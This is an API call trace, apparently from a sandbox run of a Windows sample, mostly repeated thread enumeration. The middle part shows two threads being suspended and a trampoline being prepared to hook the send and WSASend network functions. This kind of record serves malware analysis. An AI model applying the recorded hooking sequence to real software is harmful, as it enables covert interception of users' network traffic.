[0168.349] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.349] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.350] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.350] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.350] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.350] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.351] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.351] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.351] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.351] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.352] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.352] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.352] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.353] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.353] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.353] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.353] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.354] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.354] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.354] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.355] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.355] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.355] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.355] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.356] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.356] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.356] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.356] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.357] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.357] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.357] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.358] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.358] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.358] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.358] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.359] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.359] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.359] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.360] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.360] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.360] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.360] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.361] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.361] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.361] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.361] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.362] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.362] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.362] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.363] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.363] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.363] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.363] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.484] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.484] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.485] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.485] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.485] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.486] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.486] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.486] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.486] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.487] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.487] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.487] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.487] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.488] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.488] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.488] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.489] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.489] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.489] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.490] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.490] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.490] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.490] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.491] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.491] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.491] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.491] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.492] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.492] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.492] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.493] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.493] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.493] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.493] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.494] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.494] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.494] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.495] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.495] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.495] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.495] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.496] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.496] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.496] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.496] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.512] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x210) returned 0x8c [0168.512] SuspendThread (hThread=0x8c) returned 0x0 [0168.512] CloseHandle (hObject=0x8c) returned 1 [0168.512] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9c4) returned 0x8c [0168.512] SuspendThread (hThread=0x8c) returned 0x0 [0168.512] CloseHandle (hObject=0x8c) returned 1 [0168.644] CloseHandle (hObject=0x88) returned 1 [0168.645] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0168.645] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0168.645] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0168.645] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xf0000 [0168.645] RtlMoveMemory (in: Destination=0xf0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xf0000) [0168.646] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0168.651] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0168.652] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0168.652] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0168.652] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x100000 [0168.652] RtlMoveMemory (in: Destination=0x100000, Source=0x75bc4406, Length=0x5 | out: Destination=0x100000) [0168.652] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0168.657] GetCurrentProcessId () returned 0x2c8 [0168.657] GetCurrentThreadId () returned 0xa00 [0168.657] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0168.725] Thread32First (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.726] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.726] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.726] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.726] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.727] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.727] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.727] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.727] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.728] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.728] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.728] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.729] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.729] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.729] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.729] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.730] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.730] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.730] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.730] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.731] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.731] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.731] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.732] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.732] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.732] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.732] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.733] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.733] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.733] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.733] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.734] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.734] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.734] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.735] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.735] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.735] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.735] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.736] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.736] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.736] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.737] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.737] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.737] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.737] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.738] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.738] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.738] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.738] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.739] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.739] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.739] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.740] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.740] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.740] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.740] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.741] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.741] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.741] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.741] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.742] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.742] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.742] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.743] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.743] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.743] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.743] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.744] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.744] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.744] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.745] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.745] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.745] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.745] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.746] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.746] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.746] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.746] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.747] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.747] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.747] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.748] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.748] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.748] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.748] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.749] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.749] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.749] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.749] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.750] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.750] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.750] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.751] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.751] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.751] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.751] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.752] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.752] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.752] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.753] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.753] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.753] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.753] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.754] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.754] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.754] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.755] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.755] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.755] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.755] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.756] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.756] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.756] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.757] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.757] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.757] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.757] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.758] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.758] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.758] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.758] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.759] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.759] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.759] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.760] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.760] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.760] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.760] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.761] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.761] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.761] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.762] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.762] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.762] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.762] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.763] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.763] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.763] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.763] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.764] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.764] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.764] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.765] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.765] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.765] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.765] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.766] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.766] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.766] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.766] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.767] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.767] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.767] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.768] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.768] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.768] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.768] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.769] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.769] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.825] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.825] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.825] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.826] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.826] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.826] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.826] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.827] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.827] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.827] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.827] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.828] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.828] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.828] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.829] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.829] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.829] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.830] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.830] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.830] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.830] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.831] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.831] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.831] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.831] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.832] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.832] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.832] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.833] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.833] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.833] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.833] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.834] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.834] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.834] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.835] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.835] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.835] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.835] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.836] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.836] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.836] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.837] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.837] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.837] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.837] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.838] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.838] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.838] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.839] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.839] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.839] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.839] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.840] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.840] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.840] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.841] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.841] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.841] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.841] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.842] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.842] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.842] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.842] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.843] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.843] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.843] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.844] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.844] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.844] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.844] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.845] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.845] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.845] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.846] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.846] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.846] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.846] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.847] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.847] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.847] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.847] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.848] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.848] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.848] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.849] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.849] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.849] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.849] Thread32Next (hSnapshot=0x88, lpte=0x222fb08) returned 1 [0168.850] 